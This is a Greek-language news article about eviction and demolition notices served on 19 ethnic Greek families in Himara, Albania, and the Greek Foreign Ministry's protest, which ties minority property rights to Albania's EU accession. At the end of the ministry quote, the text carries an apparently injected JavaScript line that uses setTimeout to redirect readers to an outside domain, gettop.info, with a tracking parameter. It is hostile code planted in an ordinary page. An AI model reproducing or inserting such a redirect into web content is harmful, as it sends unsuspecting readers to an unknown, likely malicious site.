Κατεδαφίζουν τα σπίτια ομογενών στη Χειμάρρα – Αντίδραση από το ΥΠΕΞ

0
6

 

Ειδοποιητήρια με τα οποία τους ανακοινωνόταν ότι πρέπει να εκκενώσουν τα σπίτια τους σε πέντε ημέρες κθώς αναμένται αυτά να κατεδαφιστούν στο πλαίσιο του σχεδίου ανάπτυξης της Χειμάρρας, έλαβαν 19 οικογένειες που ανήκουν στην Ελληνική Εθνική Μειονότητα. Το υπουργείο Εξωτερικών αντέδρασε αμέσως ζητώντας την άμεση ακύρωση της κατεδάφισης οικιών Ελλήνων ομογενών στη Χειμάρρα και τη διενέργεια ουσιαστικών διαβουλεύσεων με τους ιδιοκτήτες για τα σχέδια ανάπλασης της πόλης.

Επιπλέον, το ΥΠΕΞ εκφράζει προς τις αλβανικές Αρχές την ιδιαίτερη ανησυχία για τα ειδοποιητήρια που έλαβαν  οι 19 οικογένειες.

«Η προστασία των περιουσιακών δικαιωμάτων και δη των μειονοτικών δικαιωμάτων αποτελεί αναπόσπαστο τμήμα των 5 προϋποθέσεων που έχει θέσει η Ευρωπαϊκή Ένωση για την έναρξη ενταξιακών διαπραγματεύσεων της Αλβανίας με την Ευρωπαϊκή Ένωση.

Ως εκ τούτου, εφόσον η Αλβανία ειλικρινά επιθυμεί να ενταχθεί στην Ευρωπαϊκή Ένωση θα πρέπει να αποδείξει στην πράξη ότι λειτουργεί ως κράτος Δικαίου προστατεύοντας από αυθαιρεσίες και παρανομίες τα δικαιώματα όλων των κατοίκων της ανεξαρτήτως εθνικής καταγωγής και προελεύσεως» σύμφωνα με την ανακοίνωση,. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here